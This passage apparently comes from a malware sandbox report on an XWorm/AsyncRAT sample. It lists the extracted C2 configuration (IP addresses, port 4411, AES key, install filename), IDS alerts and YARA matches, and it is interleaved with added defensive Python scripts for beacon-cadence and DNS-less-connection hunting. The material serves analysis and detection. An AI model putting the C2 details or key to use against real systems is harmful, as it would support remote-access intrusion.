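def off_cadence_alerts(timestamps: List[str], tolerance: float = 0.10) -> List[str]:
    """Alerts that did not arrive one period after their predecessor. In a RAT session
    these are the candidates for command/response traffic riding on the heartbeat."""
    times = sorted(timestamps, key=parse_ts)
    gaps = inter_arrival_gaps(times)
    period = beacon_profile(times, tolerance)["period_s"]
    lo, hi = period * (1 - tolerance), period * (1 + tolerance)
    return [times[i + 1] for i, g in enumerate(gaps) if not lo <= g <= hi]


if __name__ == "__main__":
    print(beacon_profile(CLIENT_CHECKINS))
    for t in off_cadence_alerts(CLIENT_CHECKINS):
        print("off-cadence:", t)
```

On the report's data this gives a period of about 10.75 s with 9 of the 19 gaps on cadence over a 118.7 s window; the ten off-cadence alerts cluster around 09:56:21 and 09:56:42, where the server-side table also shows extra rows, which is consistent with command traffic on top of a timer-driven heartbeat. The same profile run on NetFlow or Zeek conn records from a production segment is a reasonable hunt for 4411/tcp sessions to unknown hosts even before a signature exists.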


            AV Detection

Source: fg.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll; Avira: detection malicious, Label: TR/Dropper.Gen7
Source: 0000000C.00000002.2858010700.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["185.7.214.108", "185.7.214.54"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: fg.exe; Virustotal: Detection: 66%
Source: fg.exe; ReversingLabs: Detection: 63%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: 185.7.214.108,185.7.214.54
Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: 4411
Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: P0WER
Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: <Xwormmm>
Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: XWorm V5.6
Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: USB.exe
Source: unknown; HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: fg.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Configuration.pdbL0uw# source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb< source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: %%.pdb(s( source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbngVideMRw source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbs>x source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Core.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdbK> source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb(@ source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbr2 source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: uild.pdb source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: HPjo0C:\Windows\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: q7C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.pdb source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q7C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.pdb@\ source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbP source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Xml.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: ?voC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbI source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Xml.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Windows.Forms.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: @vo.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2856933823.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Drawing.pdb| source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb~ source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Management.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Management.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Core.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32##5 source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERB78B.tmp.dmp.19.dr

            Networking

Source: Network traffic; Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.7.214.108:4411 -> 192.168.2.4:49717
Source: Network traffic; Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 185.7.214.108:4411 -> 192.168.2.4:49717
Source: Network traffic; Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49717 -> 185.7.214.108:4411
Source: Network traffic; Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49717 -> 185.7.214.108:4411
Source: Malware configuration extractor; URLs: 185.7.214.108
Source: Malware configuration extractor; URLs: 185.7.214.54
Source: global traffic; TCP traffic: 192.168.2.4:49717 -> 185.7.214.108:4411
Source: Joe Sandbox View; IP Address: 185.7.214.108
Source: Joe Sandbox View; ASN Name: DELUNETDE
Source: Joe Sandbox View; JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown; TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown; TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown; TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown; TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown; TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown; TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown; TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown; TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 185.7.214.108
Source: unknown; TCP traffic detected without corresponding DNS query: 23.199.214.10
Source: unknown; TCP traffic detected without corresponding DNS query: 23.199.214.10
            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: c.pki.goog
            Source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2858010700.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49719 version: TLS 1.2
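The "TCP traffic detected without corresponding DNS query" entries above are the sandbox's way of saying a process opened a socket to a hard-coded IP address, which is how a RAT with an embedded C2 address (here 185.7.214.108) normally behaves, while legitimate components (the CRL fetch to c.pki.goog) resolve a name first. The script below is an added example, not part of the Joe Sandbox report, that implements the same correlation over a DNS/connection event stream such as Sysmon Event ID 22 and Event ID 3. The event stream, the documentation-range IPs, and the KNOWN_GOOD allowlist are constructed for the example; only 185.7.214.108 is taken from the report.

```python
"""Correlate DNS answers with outbound TCP connections and surface destinations
that were contacted without any preceding name resolution.  Added example over a
constructed event stream; it is not sandbox output."""
import ipaddress
from collections import defaultdict

# Ranges that never need a DNS lookup to be legitimate: RFC 1918, loopback,
# link-local.  Kept explicit rather than using ipaddress.is_private, which
# would also swallow the documentation ranges used in the sample below.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_local(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def find_dnsless_connections(events, allowlist=frozenset()):
    """events: iterable of (timestamp, kind, data) with kind 'dns' (data has
    'query' and 'answers') or 'conn' (data has 'dst_ip').  Returns a dict
    dst_ip -> number of connections made before any DNS answer named that IP.
    Ordering matters: an answer that arrives after the connection does not
    excuse it, which is exactly the sandbox's 'no corresponding DNS query'."""
    resolved = {}                     # ip -> first hostname that resolved to it
    hits = defaultdict(int)
    for ts, kind, data in sorted(events, key=lambda e: e[0]):
        if kind == "dns":
            for ip in data["answers"]:
                resolved.setdefault(ip, data["query"])
        elif kind == "conn":
            ip = data["dst_ip"]
            if ip in resolved or ip in allowlist or is_local(ip):
                continue
            hits[ip] += 1
    return dict(hits)


def rank(hits):
    """Most-contacted unresolved destination first: a repeated connection to one
    unresolved IP is the strongest C2 candidate."""
    return sorted(hits.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample stream (not sandbox output).  192.0.2.0/24, 198.51.100.0/24
# and 203.0.113.0/24 are documentation ranges standing in for real hosts; the
# only address taken from the report is 185.7.214.108.
SAMPLE_EVENTS = [
    (1.0, "dns",  {"query": "c.pki.goog", "answers": ["192.0.2.10"]}),
    (1.2, "conn", {"dst_ip": "192.0.2.10"}),      # resolved first: CRL fetch
    (2.0, "conn", {"dst_ip": "185.7.214.108"}),   # never resolved
    (2.5, "conn", {"dst_ip": "203.0.113.5"}),     # never resolved, allowlisted below
    (3.0, "conn", {"dst_ip": "185.7.214.108"}),
    (3.1, "conn", {"dst_ip": "10.0.0.5"}),        # RFC 1918, ignored
    (3.9, "conn", {"dst_ip": "198.51.100.7"}),    # connects before the answer...
    (4.0, "dns",  {"query": "late.example", "answers": ["198.51.100.7"]}),
]

# Assumed allowlist of infrastructure the analyst has already vetted.
KNOWN_GOOD = frozenset({"203.0.113.5"})

if __name__ == "__main__":
    for ip, n in rank(find_dnsless_connections(SAMPLE_EVENTS, KNOWN_GOOD)):
        print(f"{ip:<16} {n} connection(s) without a preceding DNS answer")
```

On a real host the allowlist does the heavy lifting: Windows telemetry, update and certificate-revocation endpoints are routinely contacted by IP, so the list of unresolved destinations should be reduced against known vendor ranges before anything is treated as a C2 candidate. The ordering rule (a DNS answer only excuses connections that come after it) is what keeps a later, unrelated resolution from hiding an earlier hard-coded connection.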

            System Summary

            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000003.1392608875.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000003.1390048406.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000003.1392073951.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000003.1390119908.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, LoadApiName.cs | Large array initialization: Bytes: array initializer size 33280
            Source: 4.2.fg.exe.5150000.4.raw.unpack, LoadApiName.cs | Large array initialization: Bytes: array initializer size 33280
            Source: cy31atwy.dll.8.dr, LoadApiName.cs | Large array initialization: Bytes: array initializer size 33280
            Source: fg.exe, GetPool.cs | Long String: Length: 139156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_011B81D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_011B5510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_011BBBD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_011B5DE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_011BAE98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_011B51C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_011B0BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1668
            Source: fg.exe, 00000004.00000000.1358622415.0000000000948000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWarePlay.exe2 vs fg.exe
            Source: fg.exe, 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs fg.exe
            Source: fg.exe, 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamecy31atwy.dll4 vs fg.exe
            Source: fg.exe, 00000004.00000002.1401428852.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs fg.exe
            Source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs fg.exe
            Source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecy31atwy.dll4 vs fg.exe
            Source: fg.exe | Binary or memory string: OriginalFilenameWarePlay.exe2 vs fg.exe
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
